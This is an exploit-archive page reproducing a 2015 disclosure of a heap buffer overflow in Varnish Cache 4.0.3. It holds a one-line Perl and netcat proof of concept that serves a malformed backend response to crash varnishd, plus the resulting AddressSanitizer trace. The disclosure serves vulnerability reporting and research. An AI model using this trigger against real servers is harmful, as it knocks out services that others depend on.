what you don't know can hurt you

Varnish Cache 4.03 Buffer Overflow

Varnish Cache 4.03 Buffer Overflow
Posted Mar 10, 2015
Authored by Filip Palian, Marek Kroemeke, Akat1

Varnish Cache version 4.0.3 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | a6bf0dcb9a016c94f4ef460645eb0ccc

Varnish Cache 4.03 Buffer Overflow

Change Mirror Download
Hi there,

Latest varnish-cache 4.0.3 (https://www.varnish-cache.org/) seem to have a problem with parsing HTTP responses from backend.
The following example response will trigger a heap buffer overflow :

-- cut --
perl -e 'print "HTTP/1.1 200 OK\r\nContent-Length: dupa" . "\n" x 15855 . "A" x 10000 . "\n" ' | nc -l 1098
-- cut --

assuming your config uses localhost:1098 as backend.


meh kernel: [2045151.042468] traps: varnishd[25794] general protection ip:42982c sp:7eff082db2d0 error:0 in varnishd[400000+ac000]

Original asan report :
--- cut ---
=================================================================
==12962==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900cb24200 at pc 0x7feffed5a87b bp 0x7fef7b213fa0 sp 0x7fef7b213760
WRITE of size 32029 at 0x62900cb24200 thread T596
#0 0x7feffed5a87a (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e87a)
#1 0x7feffff11849 in HTTP1_Read (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xe8849)
#2 0x7feffff04727 in v1f_pull_straight (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xdb727)
#3 0x7fefffee1a35 in vfp_call (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb8a35)
#4 0x7fefffee210f in VFP_Suck (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb910f)
#5 0x7fefffee2ee3 in VFP_Fetch_Body (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb9ee3)
#6 0x7fefffed9f56 in vbf_stp_fetch (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb0f56)
#7 0x7fefffedea60 in vbf_fetch_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb5a60)
#8 0x7feffff2d06a in Pool_Work_Thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10406a)
#9 0x7feffff7b040 in wrk_thread_real (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152040)
#10 0x7feffff7b442 in WRK_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152442)
#11 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
#12 0x7feffd9fa00c in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xfb00c)

0x62900cb24200 is located 0 bytes to the right of 16384-byte region [0x62900cb20200,0x62900cb24200)
allocated by thread T596 here:
#0 0x7feffed807df in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x547df)
#1 0x7feffffbe5e1 in sma_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1955e1)
#2 0x7feffffb04c9 in stv_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1874c9)
#3 0x7feffffb0e7b in stv_alloc_obj (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x187e7b)
#4 0x7feffffb39ee in STV_alloc (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x18a9ee)
#5 0x7fefffee1696 in VFP_GetStorage (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb8696)
#6 0x7fefffee2953 in VFP_Fetch_Body (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb9953)
#7 0x7fefffed9f56 in vbf_stp_fetch (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb0f56)
#8 0x7fefffedea60 in vbf_fetch_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xb5a60)
#9 0x7feffff2d06a in Pool_Work_Thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10406a)
#10 0x7feffff7b040 in wrk_thread_real (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152040)
#11 0x7feffff7b442 in WRK_thread (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x152442)
#12 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T596 created by T16 here:
#0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
#1 0x7feffff2d18d in pool_breed (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x10418d)
#2 0x7feffff2dd3f in pool_herder (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x104d3f)
#3 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T16 created by T6 here:
#0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
#1 0x7feffff2f043 in pool_mkpool (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x106043)
#2 0x7feffff2f527 in pool_poolherder (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x106527)
#3 0x7feffdccd181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)

Thread T6 created by T0 here:
#0 0x7feffed4fc4a in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x23c4a)
#1 0x7feffff2f8e1 in Pool_Init (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x1068e1)
#2 0x7feffff1a4cb in child_main (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0xf14cb)
#3 0x7feffff91402 in mgt_launch_child (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x168402)
#4 0x7feffff92e06 in mgt_reap_child (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x169e06)
#5 0x7feffff90541 in child_listener (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x167541)
#6 0x7feffeb09ce7 in vev_schedule_one (/home/meh/varnish-4.0.3-asan/lib/varnish/libvarnish.so+0x24ce7)
#7 0x7feffeb084b8 in vev_schedule (/home/meh/varnish-4.0.3-asan/lib/varnish/libvarnish.so+0x234b8)
#8 0x7feffff93ff6 in MGT_Run (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x16aff6)
#9 0x7feffff9db1f in main (/home/meh/varnish-4.0.3-asan/sbin/varnishd+0x174b1f)
#10 0x7feffd920ec4 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x0c528195c7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c528195c800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c528195c810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c528195c820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c528195c830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c528195c840:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c528195c850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c528195c860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c528195c870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c528195c880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c528195c890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

--- cut ---

Our understanding after previous reports is that varnish security model assumes full
trust of the backend, so this is not considered a security problem (but we do).

Best regards,

Filip Palian
Akat1
Marek Kroemeke


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    2 Files
  • 2
    Mar 2nd
    18 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    12 Files
  • 5
    Mar 5th
    19 Files
  • 6
    Mar 6th
    8 Files
  • 7
    Mar 7th
    1 Files
  • 8
    Mar 8th
    1 Files
  • 9
    Mar 9th
    11 Files
  • 10
    Mar 10th
    15 Files
  • 11
    Mar 11th
    9 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    13 Files
  • 14
    Mar 14th
    10 Files
  • 15
    Mar 15th
    13 Files
  • 16
    Mar 16th
    27 Files
  • 17
    Mar 17th
    15 Files
  • 18
    Mar 18th
    23 Files
  • 19
    Mar 19th
    25 Files
  • 20
    Mar 20th
    10 Files
  • 21
    Mar 21st
    6 Files
  • 22
    Mar 22nd
    1 Files
  • 23
    Mar 23rd
    22 Files
  • 24
    Mar 24th
    15 Files
  • 25
    Mar 25th
    23 Files
  • 26
    Mar 26th
    20 Files
  • 27
    Mar 27th
    15 Files
  • 28
    Mar 28th
    10 Files
  • 29
    Mar 29th
    1 Files
  • 30
    Mar 30th
    18 Files
  • 31
    Mar 31st
    6 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close